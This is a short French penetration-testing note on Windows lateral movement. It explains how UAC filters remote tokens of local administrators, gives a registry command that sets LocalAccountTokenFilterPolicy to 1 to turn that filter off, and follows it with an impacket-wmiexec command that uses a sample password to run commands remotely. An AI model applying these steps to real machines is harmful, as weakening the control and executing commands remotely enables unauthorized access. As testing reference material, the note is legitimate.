Whackermelon
notes / elevation-de-privileges / elevation-de-privileges-windows / admin-local-distant-localaccounttokenfilterpolicy

Admin local distant — LocalAccountTokenFilterPolicy

sommaire

Problème

UAC filtre les tokens des comptes LOCAUX admins (sauf RID 500) en accès distant : wmiexec/psexec échouent avec rpc_s_access_denied alors que le compte est bien dans Administrators.

Fix (nécessite SYSTEM/admin sur la cible)

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Ensuite

impacket-wmiexec './piv:Passw0rd123!@<IP>' 'whoami'